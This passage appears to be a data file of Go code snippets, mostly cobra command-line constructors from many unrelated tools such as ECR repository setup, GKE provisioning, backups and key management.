\"create-repo\",\n\t\tShort: \"ecr-utils create-repo commands\",\n\n\t\tRun: createFunc,\n\t}\n\tcmd.PersistentFlags().BoolVarP(&enablePrompt, \"enable-prompt\", \"e\", true, \"'true' to enable prompt mode\")\n\tcmd.PersistentFlags().StringVar(&logLevel, \"log-level\", \"info\", \"Log level (debug, info, warn, error, dpanic, panic, fatal)\")\n\tcmd.PersistentFlags().StringVar(&partition, \"partition\", \"aws\", \"AWS partition\")\n\tcmd.PersistentFlags().StringVar(&repoAccountID, \"repo-account-id\", \"\", \"AWS repository account ID\")\n\tcmd.PersistentFlags().StringVar(&repoName, \"repo-name\", \"\", \"AWS ECR repository name\")\n\tcmd.PersistentFlags().StringSliceVar(&regions, \"regions\", nil, \"AWS regions to create repository; if empty create for all available regions\")\n\tcmd.PersistentFlags().BoolVar(&imgScanOnPush, \"image-scan-on-push\", false, \"true to scan images on push\")\n\tcmd.PersistentFlags().StringVar(&imgTagMutability, \"image-tag-mutability\", ecr.ImageTagMutabilityMutable, \"MUTABLE to allow tag overwrites\")\n\tcmd.PersistentFlags().StringVar(&policyFilePath, \"policy-file-path\", \"\", \"AWS ECR policy JSON file path\")\n\tcmd.PersistentFlags().BoolVar(&setPolicyForce, \"set-policy-force\", false, \"true to force-write ECR repository policy\")\n\treturn cmd\n}", "func NewManifestCreateCmd() *cobra.Command {\n\tcreateCmd := &cobra.Command{\n\t\tUse: \"create MANIFEST_LIST MANIFEST [MANIFEST...] \",\n\t\tShort: \"Create a local manifest list\",\n\t\tExample: manifestCreateExample,\n\t\tRunE: manifestCreateCommand,\n\t\tDisableFlagsInUseLine: true,\n\t}\n\n\treturn createCmd\n}", "func CreateCmd() *cobra.Command {\n\tvar cmd = cobra.Command{\n\t\tUse: \"ch.viac\",\n\t\tShort: \"Import VIAC values from JSON files\",\n\t\tLong: `Open app.viac.ch, choose a portfolio, and select \"From start\" in the overview dash. In the Chrome dev tools, save the response from the \"performance\" XHR call, and pass the resulting file to this importer.`,\n\n\t\tArgs: cobra.ExactValidArgs(1),\n\n\t\tRunE: run,\n\t}\n\tcmd.Flags().StringP(\"from\", \"f\", \"0001-01-01\", \"YYYY-MM-DD - ignore entries before this date\")\n\tcmd.Flags().StringP(\"account\", \"a\", \"\", \"account name\")\n\treturn &cmd\n}", "func New(cfg *Config) (*Cmd, error) {\n\t_, err := signatureAndHashAlgorithmByKeyType(cfg.Key.Type)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"key type %v is not supported\", cfg.Key.Type)\n\t}\n\n\tkh, err := cfg.KMS.Get(cfg.Key.ID)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"kms get kh: %w\", err)\n\t}\n\n\tpubBytes, err := cfg.KMS.ExportPubKeyBytes(cfg.Key.ID)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"export pub key bytes: %w\", err)\n\t}\n\n\tsetOfIssuers := map[string]struct{}{}\n\tfor _, issuer := range cfg.Issuers {\n\t\tsetOfIssuers[issuer] = struct{}{}\n\t}\n\n\tcfg.Key.kh = kh\n\n\treturn &Cmd{\n\t\tclient: cfg.Trillian,\n\t\tvdr: cfg.VDR,\n\t\tVCLogID: sha256.Sum256(pubBytes),\n\t\tlogID: cfg.LogID,\n\t\tkms: cfg.KMS,\n\t\tkey: cfg.Key,\n\t\tcrypto: cfg.Crypto,\n\t\tissuers: setOfIssuers,\n\t}, nil\n}", "func New(buildRevision, buildTime string) *cobra.Command {\n\trootCmd := &cobra.Command{\n\t\tUse: \"iris-cli\",\n\t\tShort: \"Command Line Interface for Iris\",\n\t\tLong: `Iris CLI is a tool for Iris Web Framework.\nIt can be used to install starter kits and project structures \nComplete documentation is available at https://github.com/kataras/iris-cli`,\n\t\tSilenceErrors: true,\n\t\tSilenceUsage: true,\n\t\tTraverseChildren: true,\n\t\tSuggestionsMinimumDistance: 1,\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t},\n\t}\n\n\thelpTemplate := HelpTemplate{\n\t\tBuildRevision: buildRevision,\n\t\tBuildTime: buildTime,\n\t\tShowGoRuntimeVersion: true,\n\t}\n\trootCmd.SetHelpTemplate(helpTemplate.String())\n\n\t// Commands.\n\trootCmd.AddCommand(newCommand())\n\trootCmd.AddCommand(runCommand())\n\trootCmd.AddCommand(addCommand())\n\n\treturn rootCmd\n}", "func NewCommand(ctx context.Context, cmd string, args ...string) *Command {\n\tif ctx == nil {\n\t\tpanic(\"plugin.newCommand called with a nil context\")\n\t}\n\tcmdObj := &Command{\n\t\tc: exec.Command(cmd, args...),\n\t\tctx: ctx,\n\t\tpgid: -1,\n\t\twaitDoneCh: make(chan struct{}),\n\t}\n\tcmdObj.c.SysProcAttr = &syscall.SysProcAttr{\n\t\tSetpgid: true,\n\t}\n\treturn cmdObj\n}", "func NewRootCmd(use string, dockerCli command.Cli) *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tShort: \"Docker Application\",\n\t\tLong: `A tool to build and manage Docker Applications.`,\n\t\tUse: use,\n\t\tAnnotations: map[string]string{\"experimentalCLI\": \"true\"},\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tif showVersion {\n\t\t\t\tfmt.Fprintln(os.Stdout, internal.FullVersion()) //nolint:errcheck\n\t\t\t\treturn nil\n\t\t\t}\n\n\t\t\tif len(args) != 0 {\n\t\t\t\treturn fmt.Errorf(\"%q is not a docker app command\\nSee 'docker app --help'\", args[0])\n\t\t\t}\n\t\t\tcmd.HelpFunc()(cmd, args)\n\t\t\treturn nil\n\t\t},\n\t}\n\taddCommands(cmd, dockerCli)\n\n\tcmd.Flags().BoolVar(&showVersion, \"version\", false, \"Print version information\")\n\treturn cmd\n}", "func NewDeploymentCmd(cli *client.Cli) *cobra.Command {\n\n\tvar DeploymentCmd = &cobra.Command{\n\t\tUse: \"deployment COMMAND\",\n\t\tShort: \"Manage deployments\",\n\t}\n\n\tDeploymentCmd.AddCommand(newGetCommand(cli))\n\tDeploymentCmd.AddCommand(newCreateCommand(cli))\n\tDeploymentCmd.AddCommand(newPromoteCommand(cli))\n\n\treturn DeploymentCmd\n}", "func NewCmd(o *Options) *cobra.Command {\n\tc := newGkeCmd(o)\n\n\tcmd := &cobra.Command{\n\t\tUse: \"gke\",\n\t\tShort: \"Provisions a Google Kubernetes Engine (GKE) cluster on Google Cloud Platform (GCP).\",\n\t\tLong: `Use this command to provision a GKE cluster on GCP for Kyma installation. Use the flags to specify cluster details.\nNOTE: To access the provisioned cluster, make sure you get authenticated by Google Cloud SDK. To do so,run ` + \"`gcloud auth application-default login`\" + ` and log in with your Google Cloud credentials.`,\n\n\t\tRunE: func(_ *cobra.Command, _ []string) error { return c.Run() },\n\t}\n\n\tcmd.Flags().StringVarP(&o.Name, \"name\", \"n\", \"\", \"Name of the GKE cluster to provision. (required)\")\n\tcmd.Flags().StringVarP(&o.Project, \"project\", \"p\", \"\", \"Name of the GCP Project where you provision the GKE cluster. (required)\")\n\tcmd.Flags().StringVarP(&o.CredentialsFile, \"credentials\", \"c\", \"\", \"Path to the GCP service account key file. (required)\")\n\tcmd.Flags().StringVarP(&o.KubernetesVersion, \"kube-version\", \"k\", \"1.19\", \"Kubernetes version of the cluster.\")\n\tcmd.Flags().StringVarP(&o.Location, \"location\", \"l\", \"europe-west3-a\", \"Region (e.g. europe-west3) or zone (e.g. europe-west3-a) of the cluster.\")\n\tcmd.Flags().StringVarP(&o.MachineType, \"type\", \"t\", \"n1-standard-4\", \"Machine type used for the cluster.\")\n\tcmd.Flags().IntVar(&o.DiskSizeGB, \"disk-size\", 50, \"Disk size (in GB) of the cluster.\")\n\tcmd.Flags().IntVar(&o.NodeCount, \"nodes\", 3, \"Number of cluster nodes.\")\n\t// Temporary disabled flag. To be enabled when hydroform supports TF modules\n\t//cmd.Flags().StringSliceVarP(&o.Extra, \"extra\", \"e\", nil, \"Provide one or more arguments of the form NAME=VALUE to add extra configurations.\")\n\tcmd.Flags().UintVar(&o.Attempts, \"attempts\", 3, \"Maximum number of attempts to provision the cluster.\")\n\n\treturn cmd\n}", "func NewCmdIP(out io.Writer) *cobra.Command {\n\topts := &ipOpts{}\n\n\tcmd := &cobra.Command{\n\t\tUse: \"ip\",\n\t\tShort: \"retrieve the IP address of the cluster\",\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tif len(args) != 0 {\n\t\t\t\treturn fmt.Errorf(\"Unexpected args: %v\", args)\n\t\t\t}\n\t\t\tplanner := &install.FilePlanner{File: opts.planFilename}\n\n\t\t\tip, err := doIP(out, planner, opts)\n\t\t\tif err != nil {\n\t\t\t\treturn fmt.Errorf(\"Error getting cluster IP: %v\", err)\n\t\t\t}\n\n\t\t\tfmt.Fprintln(out, ip)\n\t\t\treturn nil\n\t\t},\n\t}\n\n\t// PersistentFlags\n\tcmd.PersistentFlags().StringVarP(&opts.planFilename, \"plan-file\", \"f\", \"kismatic-cluster.yaml\", \"path to the installation plan file\")\n\n\treturn cmd\n}", "func New(appName string) (*ffcli.Command, *Config) {\n\tcfg := Config{\n\t\tAppName: appName,\n\t}\n\n\tfs := flag.NewFlagSet(appName, flag.ExitOnError)\n\tcfg.RegisterFlags(fs)\n\n\treturn &ffcli.Command{\n\t\tShortUsage: appName + \" [flags] <subcommand> [flags] [<arg>...]\",\n\t\tFlagSet: fs,\n\t\tExec: cfg.Exec,\n\t}, &cfg\n}", "func newImportCmd() *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"import [moniker] [keyfile]\",\n\t\tShort: \"import a private key to import a new keyfile\",\n\t\tLong: `\nImport keys to [moniker] from private key file [keyfile].\n`,\n\t\tArgs: cobra.ExactArgs(2),\n\t\tRunE: importKey,\n\t}\n\n\treturn cmd\n}", "func NewCommand(runtime *cli.Runtime, config *print.Config) *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tArgs: cobra.ExactArgs(1),\n\t\tUse: \"xml [PATH]\",\n\t\tShort: \"Generate XML of inputs and outputs\",\n\t\tAnnotations: cli.Annotations(\"xml\"),\n\t\tPreRunE: runtime.PreRunEFunc,\n\t\tRunE: runtime.RunEFunc,\n\t}\n\treturn cmd\n}", "func NewCmdVersion() *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"version\",\n\t\tShort: \"Show dmaas-operator version\",\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\tshowVersion()\n\t\t},\n\t}\n\n\treturn cmd\n}", "func NewCmdVolumeExporter() *cobra.Command {\n\t// create an instance of VolumeExporterOptions to initialize with default\n\t// values for the flags.\n\toptions := VolumeExporterOptions{}\n\toptions.ControllerAddress = \"http://localhost:9501\"\n\toptions.ListenAddress = \":9500\"\n\toptions.MetricsPath = \"/metrics\"\n\tcmd := &cobra.Command{\n\t\tUse: \"monitor\",\n\t\tShort: \"Collect metrics from OpenEBS volumes\",\n\t\tLong: ` monitor command is used to start monitoring openebs volumes. It\n start collecting metrics from the jiva controller at the endpoint\n \"/v1/stats\" and push it to Prometheus Server`,\n\t\tExample: ` maya-agent monitor -a=http://localhost:8001 -c=:9500 -m=/metrics`,\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\tutil.CheckErr(Run(cmd, &options), util.Fatal)\n\t\t},\n\t}\n\n\tAddControllerAddressFlag(cmd, &options.ControllerAddress)\n\tAddListenAddressFlag(cmd, &options.ListenAddress)\n\tAddMetricsPathFlag(cmd, &options.MetricsPath)\n\n\treturn cmd\n}", "func newDeleteCommand(cmd *cliCommand) cli.Command {\n\treturn cli.Command{\n\t\tName: \"delete\",\n\t\tAliases: []string{\"rm\"},\n\t\tUsage: \"Delete a file from the bucket\",\n\t\tFlags: []cli.Flag{\n\t\t\tcli.StringFlag{\n\t\t\t\tName: \"b, bucket\",\n\t\t\t\tUsage: \"the name of the s3 bucket containing the encrypted files\",\n\t\t\t\tEnvVar: \"AWS_S3_BUCKET\",\n\t\t\t},\n\t\t},\n\t\tAction: func(cx *cli.Context) error {\n\t\t\treturn handleCommand(cx, []string{\"l:bucket:s\"}, cmd, deleteFile)\n\t\t},\n\t}\n}", "func newCommand(devfileObj parser.DevfileObj, devfileCmd v1alpha2.Command) (command, error) {\n\tvar cmd command\n\n\tcommandType, err := common.GetCommandType(devfileCmd)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tswitch commandType {\n\n\tcase v1alpha2.ApplyCommandType:\n\t\tcmd = newApplyCommand(devfileObj, devfileCmd)\n\n\tcase v1alpha2.CompositeCommandType:\n\t\tif util.SafeGetBool(devfileCmd.Composite.Parallel) {\n\t\t\tcmd = newParallelCompositeCommand(devfileObj, devfileCmd)\n\t\t}\n\t\tcmd = newCompositeCommand(devfileObj, devfileCmd)\n\n\tcase v1alpha2.ExecCommandType:\n\t\tcmd = newExecCommand(devfileObj, devfileCmd)\n\t}\n\n\tif err = cmd.CheckValidity(); err != nil {\n\t\treturn nil, err\n\t}\n\treturn cmd, nil\n}", "func New() *cobra.Command {\n\tsetCmd.Flags().StringVarP(&mode, \"mode\", \"m\", \"\", \"mode options are heat, cool, auto, fan\")\n\tsetCmd.Flags().StringVarP(&fan, \"fan\", \"f\", \"\", \"fan speed options are 1, 2 or 3\")\n\tsetCmd.Flags().StringVarP(&power, \"power\", \"p\", \"\", \"power options are on or off\")\n\tsetCmd.Flags().StringVarP(&temp, \"temp\", \"t\", \"\", \"temp options are up to you\")\n\tsetCmd.Flags().StringVarP(&br, \"bedroom\", \"b\", \"\", \"bedroom enabled (on/off)\")\n\tsetCmd.Flags().StringVarP(&st, \"study\", \"s\", \"\", \"study enabled (on/off)\")\n\n\treturn setCmd\n}", "func newBundleBuildCmd() *cobra.Command {\n\tbundleBuildCmd := &cobra.Command{\n\t\tUse: \"build\",\n\t\tShort: \"Build operator bundle image\",\n\t\tLong: `The \"opm alpha bundle build\" command will generate operator\nbundle metadata if needed and build bundle image with operator manifest\nand metadata for a specific version.\n\nFor example: The command will generate annotations.yaml metadata plus\nDockerfile for bundle image and then build a container image from\nprovided operator bundle manifests generated metadata\ne.g. \"quay.io/example/operator:v0.0.1\".\n\nAfter the build process is completed, a container image would be built\nlocally in docker and available to push to a container registry.\n\n$ opm alpha bundle build --directory /test/0.1.0/ --tag quay.io/example/operator:v0.1.0 \\\n\t--package test-operator --channels stable,beta --default stable --overwrite\n\nNote:\n* Bundle image is not runnable.\n* All manifests yaml must be in the same directory. `,\n\t\tRunE: buildFunc,\n\t\tArgs: cobra.NoArgs,\n\t}\n\n\tbundleBuildCmd.Flags().StringVarP(&buildDir, \"directory\", \"d\", \"\",\n\t\t\"The directory where bundle manifests and metadata for a specific version are located\")\n\tif err := bundleBuildCmd.MarkFlagRequired(\"directory\"); err != nil {\n\t\tlog.Fatalf(\"Failed to mark `directory` flag for `build` subcommand as required\")\n\t}\n\n\tbundleBuildCmd.Flags().StringVarP(&tag, \"tag\", \"t\", \"\",\n\t\t\"The image tag applied to the bundle image\")\n\tif err := bundleBuildCmd.MarkFlagRequired(\"tag\"); err != nil {\n\t\tlog.Fatalf(\"Failed to mark `tag` flag for `build` subcommand as required\")\n\t}\n\n\tbundleBuildCmd.Flags().StringVarP(&pkg, \"package\", \"p\", \"\",\n\t\t\"The name of the package that bundle image belongs to \"+\n\t\t\t\"(Required if `directory` is not pointing to a bundle in the nested bundle format)\")\n\n\tbundleBuildCmd.Flags().StringVarP(&channels, \"channels\", \"c\", \"\",\n\t\t\"The list of channels that bundle image belongs to\"+\n\t\t\t\"(Required if `directory` is not pointing to a bundle in the nested bundle format)\")\n\n\tbundleBuildCmd.Flags().StringVarP(&containerTool, \"image-builder\", \"b\", \"docker\",\n\t\t\"Tool used to manage container images. One of: [docker, podman, buildah]\")\n\n\tbundleBuildCmd.Flags().StringVarP(&defaultChannel, \"default\", \"e\", \"\",\n\t\t\"The default channel for the bundle image\")\n\n\tbundleBuildCmd.Flags().BoolVarP(&overwrite, \"overwrite\", \"o\", false,\n\t\t\"To overwrite annotations.yaml locally if existed. By default, overwrite is set to `false`.\")\n\n\tbundleBuildCmd.Flags().StringVarP(&outputDir, \"output-dir\", \"u\", \"\",\n\t\t\"Optional output directory for operator manifests\")\n\n\treturn bundleBuildCmd\n}", "func NewCommand(name, usage, description string, exec func(args ...string) ([]byte, error)) Command {\n\treturn &cmd{\n\t\tname: name,\n\t\tusage: usage,\n\t\tdescription: description,\n\t\texec: exec,\n\t}\n}", "func NewCommand(in io.Reader, out io.Writer, err io.Writer) *cobra.Command {\n\toptions := icrbuild.NewBuildOptions(in, out, err)\n\tcmd := &cobra.Command{\n\t\tUse: \"icrbuild [DIRECTORY]\",\n\t\tShort: \"Build a Docker image in IBM Cloud Container Registry using builder contract\",\n\t\tArgs: cobra.ExactArgs(1),\n\t\tLong: `\n `,\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\terr := options.Run(cmd, args)\n\t\t\tif err != nil {\n\t\t\t\tlogrus.Error(err)\n\t\t\t}\n\t\t},\n\t\tPersistentPreRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tif err := setUpLogs(err); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tcmd.SilenceUsage = true\n\t\t\tlogrus.Infof(\"icrbuild %+v\", version.Get())\n\t\t\treturn nil\n\t\t},\n\t}\n\n\tcmd.Version = fmt.Sprintf(\"%+v\", version.Get())\n\tcmd.SetVersionTemplate(\"{{printf .Version}}\\n\")\n\n\t//\t[--no-cache] [--pull] [--quiet | -q] [--build-arg KEY=VALUE ...] [--file FILE | -f FILE] --tag TAG DIRECTORY\n\tcmd.PersistentFlags().BoolVar(&options.Flags.NoCache, \"no-cache\", false, \"Optional: If specified, cached image layers from previous builds are not used in this build.\")\n\tcmd.PersistentFlags().BoolVar(&options.Flags.Pull, \"pull\", false, \"Optional: If specified, the base images are pulled even if an image with a matching tag already exists on the build host.\")\n\tcmd.PersistentFlags().BoolVarP(&options.Flags.Quiet, \"quiet\", \"q\", false, \"Optional: If specified, the build output is suppressed unless an error occurs.\")\n\tcmd.PersistentFlags().StringArrayVar(&options.Flags.BuildArgs, \"build-arg\", nil, \"Optional: Specify an additional build argument in the format 'KEY=VALUE'. The value of each build argument is available as an environment variable when you specify an ARG line that matches the key in your Dockerfile.\")\n\tcmd.PersistentFlags().StringVarP(&options.Flags.File, \"file\", \"f\", \"\", \"Optional: Specify the location of the Dockerfile relative to the build context. If not specified, the default is 'PATH/Dockerfile', where PATH is the root of the build context.\")\n\tcmd.PersistentFlags().StringVarP(&options.Flags.Tag, \"tag\", \"t\", \"\", \"The full name for the image that you want to build, which includes the registry URL and namespace.\")\n\tcmd.MarkFlagRequired(\"tag\")\n\n\treturn cmd\n}", "func NewBackupCmd() *cobra.Command {\n\tbackupCmd := &cobra.Command{\n\t\tUse: \"backup <server names...>\",\n\t\tShort: fmt.Sprintf(\"Back up server and world files to ~/%s\", files.BackupDirName),\n\t\tLong: `\nSave the current world and server configuration to a zip file in the backup directory.\nIf two backups are taken in the same minute, the second will overwrite the first.\nBackups are saved to a default directory under the user's home directory.\nThe backed up world is usually a few seconds behind the world state at the time of backup.\nUse the trim and skip-trim-file-removal-check flags with linux cron or windows task scheduler to automate backups.`,\n\t\tExample: `craft backup myserver\ncraft backup myserver -l\n\nLinux cron (hourly):\n0 * * * * ~/craft_backups/backup.sh\n\t\n\t#!/usr/bin/env bash\n\t~/go/bin/craft backup myserver myotherserver \\ # path to craft executable and one or more servers\n\t--skip-trim-file-removal-check --trim 3 \\ # skip cmdline prompts and delete all except 3 newest files\n\t--log ~/craft_backups/backup.log --log-level info # log to file with log level info\n`,\n\t\tArgs: cobra.MinimumNArgs(1),\n\t\tRun: backupCommand,\n\t}\n\n\tbackupCmd.Flags().IntP(\"trim\", \"t\", 0,\n\t\t\"Delete the oldest backup files, leaving the given count of newest files in place.\")\n\n\tbackupCmd.Flags().BoolP(\"list\", \"l\", false,\n\t\t\"List backup files and take no other action.\")\n\n\tbackupCmd.Flags().Bool(\"skip-trim-file-removal-check\", false,\n\t\t\"Don't prompt the user before removing files. Useful for automating backups.\")\n\n\treturn backupCmd\n}", "func (r Describe) NewCommand(ctx context.Context, name string) *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: name[strings.LastIndex(name, \".\")+1:] + \" [NAME[:VERSION]] [RESOURCE] [FILTER]\",\n\t\tShort: \"Describe registered releases with states information.\",\n\t\tLong: \"Describe registered releases with states information\",\n\t\tArgs: require.Args(r.validation),\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tvar name string\n\t\t\tvar version semver.Version\n\t\t\tif len(args) > 0 {\n\t\t\t\tparts := strings.Split(args[0], \":\")\n\t\t\t\tparts = append(parts, \"\")\n\t\t\t\tname = parts[0]\n\n\t\t\t\tif parts[1] != \"\" {\n\t\t\t\t\tvar err error\n\t\t\t\t\tversion, err = semver.Parse(parts[1])\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tvar resource string\n\t\t\tif len(args) > 1 {\n\t\t\t\tresource = args[1]\n\t\t\t}\n\n\t\t\tvar filter string\n\t\t\tif len(args) > 2 {\n\t\t\t\tfilter = args[2]\n\t\t\t}\n\n\t\t\topts := describeOptions{\n\t\t\t\tName: name,\n\t\t\t\tVersion: version,\n\t\t\t\tResource: resource,\n\t\t\t\tFilter: filter,\n\t\t\t}\n\t\t\treturn r.run(ctx, cmd.OutOrStdout(), opts)\n\t\t},\n\t\tSilenceErrors: true,\n\t\tSilenceUsage: true,\n\t}\n\n\tcmd.SetUsageTemplate(global.DefaultUsageTemplate)\n\tcmd.SetHelpCommand(&cobra.Command{Hidden: true})\n\n\tflags := cmd.Flags()\n\tflags.SortFlags = false\n\tflags.Bool(\"help\", false, \"Show help information.\")\n\treturn cmd\n}", "func New(c *Cfg) Cmd {\n\tif c.New != nil {\n\t\treturn c.New()\n\t}\n\treturn (*nilCmd)(c)\n}", "func NewCmdShow() *cobra.Command {\n\tvar showCmd = &cobra.Command{\n\t\tUse: \"show\",\n\t\tShort: \"Show dosanco resources\",\n\t}\n\tshowCmd.AddCommand(\n\t\tNewCmdShowNetwork(),\n\t\tNewCmdShowIPAM(),\n\t\tNewCmdShowVlan(),\n\t\tNewCmdShowHost(),\n\t\tNewCmdShowHostGroup(),\n\t\tNewCmdShowDataCenter(),\n\t\tNewCmdShowDataCenterFloor(),\n\t\tNewCmdShowDataCenterHall(),\n\t\tNewCmdShowRackRow(),\n\t\tNewCmdShowRack(),\n\t\tNewCmdShowUPS(),\n\t\tNewCmdShowRowPDU(),\n\t\tNewCmdShowRackPDU(),\n\t)\n\n\treturn showCmd\n}", "func NewArtifactCmd(ctx context.Context, opt *commonoptions.Common) *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"artifact\",\n\t\tDisableFlagsInUseLine: true,\n\t\tShort: \"Interact with Falco artifacts\",\n\t\tLong: \"Interact with Falco artifacts\",\n\t\tSilenceErrors: true,\n\t\tSilenceUsage: true,\n\t\tPersistentPreRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tvar indexes []config.Index\n\t\t\tvar indexCache *cache.Cache\n\t\t\tvar err error\n\n\t\t\topt.Initialize()\n\t\t\tif err = config.Load(opt.ConfigFile); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\t// add indexes if needed\n\t\t\t// Set up basic authentication\n\t\t\tif indexes, err = config.Indexes(); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\t// Create the index cache.\n\t\t\tif indexCache, err = cache.NewFromConfig(ctx, config.IndexesFile, config.IndexesDir, indexes); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\t// Save the index cache for later use by the sub commands.\n\t\t\topt.Initialize(commonoptions.WithIndexCache(indexCache))\n\n\t\t\treturn nil\n\t\t},\n\t}\n\n\tcmd.AddCommand(search.NewArtifactSearchCmd(ctx, opt))\n\tcmd.AddCommand(install.NewArtifactInstallCmd(ctx, opt))\n\tcmd.AddCommand(list.NewArtifactListCmd(ctx, opt))\n\tcmd.AddCommand(info.NewArtifactInfoCmd(ctx, opt))\n\tcmd.AddCommand(follow.NewArtifactFollowCmd(ctx, opt))\n\n\treturn cmd\n}", "func newGenerateCmd() *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"generate\",\n\t\tShort: \"bulk generate key pairs\",\n\t\tLong: `\nThe generate sub command is intended only for test nets. It generates a \nnumber of key pairs and places them in the current monet keystore. The \naccounts are names <prefix><suffix> where prefix is set by --prefix (default\n\"Account\") and suffix is a number between --min-suffix and --max-suffix \ninclusive. The defaults are 1 and 5.\n`,\n\t\tArgs: cobra.ArbitraryArgs,\n\t\tRunE: generateKey,\n\t}\n\n\tcmd.Flags().StringVar(&prefix, \"prefix\", prefix, \"prefix for account monikers\")\n\tcmd.Flags().IntVar(&minSuffix, \"min-suffix\", minSuffix, \"minimum suffix for account monikers\")\n\tcmd.Flags().IntVar(&maxSuffix, \"max-suffix\", maxSuffix, \"maximum suffix for account monikers\")\n\n\tviper.BindPFlags(cmd.Flags())\n\n\treturn cmd\n}", "func NewCommand() *cobra.Command {\n\tcmdName := path.Base(os.Args[0])\n\tif cmdName == \"main\" {\n\t\twd, err := os.Getwd()\n\t\tif err != nil {\n\t\t\tlogger.Fatal(err)\n\t\t}\n\n\t\tcmdName = path.Base(wd)\n\t}\n\n\treturn &cobra.Command{\n\t\tUse: cmdName,\n\t\tShort: \"An opinionated productive web framework that helps scaling business easier.\",\n\t\tVersion: support.VERSION,\n\t}\n}", "func NewCommand() *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tArgs: cobra.NoArgs,\n\t\tUse: \"get\",\n\t\tShort: \"get shows info about specific object\",\n\t\tLong: \"get shows info about specific objects\",\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\treturn cmd.Help()\n\t\t},\n\t}\n\t// add subcommands\n\tcmd.AddCommand(pods.NewCommand())\n\treturn cmd\n}", "func NewDownloadCmd(targetReader TargetReader) *cobra.Command {\n\treturn &cobra.Command{\n\t\tUse: \"download tf + (infra|internal-dns|external-dns|ingress|backup)\\n gardenctl download logs vpn\\n \",\n\t\tShort: \"Download terraform configuration/state for local execution for the targeted shoot or log files, e.g. \\\"gardenctl download logs vpn\\\" to download vpn logs\",\n\t\tSilenceUsage: true,\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tif len(args) != 2 || !(args[1] == \"infra\" || args[1] == \"internal-dns\" || args[1] == \"external-dns\" || args[1] == \"ingress\" || args[1] == \"backup\" || args[1] == \"vpn\") {\n\t\t\t\treturn errors.New(\"Command must be in the format:\\n download tf + (infra|internal-dns|external-dns|ingress|backup)\\n download logs vpn\")\n\t\t\t}\n\t\t\tswitch args[0] {\n\t\t\tcase \"tf\":\n\t\t\t\tpath := downloadTerraformFiles(args[1], targetReader)\n\t\t\t\tfmt.Println(\"Downloaded to \" + path)\n\t\t\tcase \"logs\":\n\t\t\t\tdownloadLogs(args[1], targetReader)\n\t\t\tdefault:\n\t\t\t\tfmt.Println(\"Command must be in the format:\\n download tf + (infra|internal-dns|external-dns|ingress|backup)\\n download logs vpn\")\n\t\t\t}\n\t\t\treturn nil\n\t\t},\n\t\tValidArgs: []string{\"tf\"},\n\t}\n}", "func NewCommand(client interfaces.Client, config interfaces.ConfigProvider) *cobra.Command {\n\tcommand := &cobra.Command{\n\t\tUse: \"apply\",\n\t\tShort: \"Make changes to existing resources\",\n\t}\n\n\tcommand.AddCommand(\n\t\tnewLicence(os.Stdout, client, config),\n\t)\n\n\treturn command\n}", "func NewCommand(ctx api.Context) *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"cluster\",\n\t\tShort: \"Manage your DC/OS clusters\",\n\t}\n\tcmd.AddCommand(\n\t\tnewCmdClusterAttach(ctx),\n\t\tnewCmdClusterLink(ctx),\n\t\tnewCmdClusterList(ctx),\n\t\tnewCmdClusterRemove(ctx),\n\t\tnewCmdClusterRename(ctx),\n\t\tnewCmdClusterSetup(ctx),\n\t\tnewCmdClusterUnlink(ctx),\n\t)\n\treturn cmd\n}", "func NewCmdImport(fullName string, f *clientcmd.Factory, in io.Reader, out, errout io.Writer) *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"import COMMAND\",\n\t\tShort: \"Commands that import applications\",\n\t\tLong: importLong,\n\t\tRun: cmdutil.DefaultSubCommandRun(errout),\n\t}\n\n\tname := fmt.Sprintf(\"%s import\", fullName)\n\n\tcmd.AddCommand(NewCmdAppJSON(name, f, in, out, errout))\n\treturn cmd\n}", "func NewCmdImport(fullName string, f *clientcmd.Factory, in io.Reader, out, errout io.Writer) *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"import COMMAND\",\n\t\tShort: \"Commands that import applications\",\n\t\tLong: importLong,\n\t\tRun: cmdutil.DefaultSubCommandRun(errout),\n\t}\n\n\tname := fmt.Sprintf(\"%s import\", fullName)\n\n\tcmd.AddCommand(NewCmdAppJSON(name, f, in, out, errout))\n\treturn cmd\n}", "func NewCmd(db *bolt.DB, r io.Reader) *cobra.Command {\n\tvar opts addOptions\n\n\tcmd := &cobra.Command{\n\t\tUse: \"add <name>\",\n\t\tShort: \"Add a two-factor authentication code\",\n\t\tLong: `Add a two-factor authentication code. The name must be one already used by an entry.\n\nServices tipically show an hyperlinked \"Enter manually\", \"Enter this text code\" or similar messages, copy the hexadecimal code given and submit it when requested by Kure. After this, your entry will have a synchronized token with the service.`,\n\t\tExample: example,\n\t\tArgs: cmdutil.MustExist(db, cmdutil.Entry), // There must exist an entry with the same name\n\t\tPreRunE: 